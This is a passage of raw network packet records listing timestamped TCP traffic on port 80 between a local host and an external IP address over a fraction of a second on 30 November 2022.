Nov 30, 2022 00:10:05.133141041 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133148909 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133160114 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133176088 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133177042 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133194923 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133210897 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133214951 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133244991 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133322001 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133339882 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133363962 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133368015 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133382082 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133399010 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133400917 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133415937 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133435965 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133615971 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133647919 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133671999 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133698940 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133721113 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133728981 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133742094 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133749008 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133764029 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133784056 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133785009 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133835077 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133841038 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133841991 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133857965 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133888006 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133909941 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133920908 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133932114 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133954048 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133955002 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133970022 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133975983 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133997917 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133997917 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.134183884 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.134202957 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.134228945 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.134232998 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.134248972 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.134263039 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.134268999 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.134280920 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.134289026 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.134313107 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.134352922 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.134469986 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.134490013 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.134526968 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.134546995 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.134565115 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.134583950 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.134603024 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.134603024 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.134623051 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.134628057 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.134680033 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.134680033 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.134984016 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.135004997 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.135044098 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.135062933 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.135070086 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.135083914 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.135103941 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.135103941 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.135123968 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.135143042 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.135144949 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.135158062 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.135164022 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.135181904 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.135189056 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.136059046 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.136101961 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.136313915 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.154285908 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154314041 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154355049 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154380083 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154428005 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.154545069 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154563904 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.154577971 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154603958 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154603958 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.154627085 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154652119 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154655933 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.154655933 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.154680967 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.154684067 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154707909 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154716015 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.154755116 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.154764891 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154792070 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154824972 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154864073 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154865026 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.154901981 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.154902935 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154930115 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154932022 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.154953003 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.154969931 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.154987097 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.155025959 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.155026913 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.155060053 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.155092001 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.155092001 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.155117989 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.155143023 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.155150890 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.155189991 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.155200005 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.155216932 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.155241013 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.155241966 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.155268908 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.155277967 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.155307055 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.155412912 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.158921957 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.158948898 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.158974886 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.158986092 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.159008026 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.159033060 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.159045935 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.159059048 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.159073114 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.159084082 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.159101963 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.159110069 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.159137964 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.159271002 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.159271002 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.160012007 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.160037994 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.160072088 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.160096884 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.160115004 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.160130978 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.160156012 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.160168886 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.160240889 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.160398006 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.163387060 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.163414001 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.163503885 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.163798094 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.164223909 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164258003 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164283037 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164309025 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164333105 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164350986 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.164360046 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164383888 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.164383888 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.164386988 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164412022 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164434910 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164436102 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.164436102 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.164479017 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164510012 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.164510012 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.164510965 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.164516926 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164566994 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.164669991 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164706945 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164709091 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.164743900 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164752960 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.164779902 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164783955 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.164814949 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164866924 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164886951 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.164886951 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.164901972 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.164936066 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.164938927 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165019035 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.165060043 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165091991 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165134907 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.165137053 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165153980 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165174961 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165190935 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165199995 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.165214062 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165231943 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165290117 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165307045 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165308952 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.165308952 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.165323973 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165342093 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165359020 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165376902 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165384054 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.165385008 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.165394068 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165411949 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165487051 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.165487051 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.165487051 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.165705919 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165728092 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165755987 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165776968 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165797949 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165817976 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165839911 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165865898 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.165905952 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.165905952 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.165905952 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.166119099 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.166707039 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.166774988 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.166809082 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.166830063 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.166923046 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.166928053 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.166953087 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.166980028 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167001009 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167011976 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167021990 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167032003 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167068958 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167102098 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167124987 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167145014 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167164087 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167179108 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167179108 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167190075 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167212009 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167212963 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167232990 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167244911 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167254925 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167274952 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167303085 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167311907 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167325020 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167361021 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167478085 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167501926 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167530060 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167561054 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167594910 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167607069 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167620897 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167640924 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167650938 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167659998 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167671919 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167679071 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167702913 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167732954 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167736053 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167752028 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167776108 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167794943 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167804956 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167824984 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167826891 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167854071 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167872906 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167891026 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.167917967 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.167929888 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.168111086 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.168128967 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.168154001 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.168160915 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.168174028 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.168206930 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.168230057 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.168248892 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.168275118 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.168281078 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.168293953 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.168313980 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.168658972 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.168845892 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.168865919 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.168891907 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.168910980 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.168930054 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.168932915 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.168950081 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.168961048 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.168970108 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.168977022 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.168988943 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169013977 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.169040918 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.169255018 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169274092 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169298887 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169317961 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169337034 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169356108 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169372082 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.169374943 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169387102 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.169394970 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169406891 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.169415951 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169435024 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169435024 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.169454098 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169472933 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169478893 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.169492006 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169509888 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169528008 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.169528961 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169539928 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.169549942 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169559002 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.169569016 CET	80	49708	88.198.94.71	192.168.2.7
